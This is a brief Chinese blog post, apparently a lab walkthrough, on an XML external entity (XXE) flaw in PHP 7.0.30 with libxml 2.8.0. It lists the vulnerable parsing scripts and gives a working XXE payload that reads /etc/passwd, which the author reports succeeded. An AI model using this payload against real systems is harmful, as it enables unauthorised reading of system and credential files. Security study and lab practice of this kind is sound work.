PHP7.0.30 XML外部实体注入漏洞(XXE)

漏洞版本

PHP7.0.30
libxml 2.8.0
  1. 打开网页看到php版本7.0.30,libxml版本2.8.0,尝试xxe
    image
    image
  2. 网站目录下文件
dom.php #使用DOMDocument解析body
index.php
SimpleXMLElement.php #使用SimpleXMLElement类解析body
Simplexml_load_string.php #使用simplexml_load_string函数解析body
  1. 抓包构造,成功读取etc/passwd
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

image

posted @ 2025-08-13 11:05  x3c  阅读(33)  评论(0)    收藏  举报